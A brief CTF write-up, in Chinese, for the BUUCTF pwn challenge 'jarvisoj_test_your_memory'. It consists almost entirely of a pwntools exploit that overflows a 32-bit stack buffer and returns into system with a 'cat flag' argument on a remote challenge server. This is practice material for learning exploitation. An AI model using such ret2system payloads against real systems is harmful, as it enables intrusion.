[BUUCTF-pwn]——jarvisoj_test_your_memory 直接通过提示栈溢出 exploit from pwn import* p=remote('node3.buuoj.cn',"29320") context.log_level = 'debug' payload='a' * (0x13 + 4)+p32(0x8048440)+p32(0x8048677)+p32(0x80487E0) #system main cat flag p.sendline(payload) p.interactive()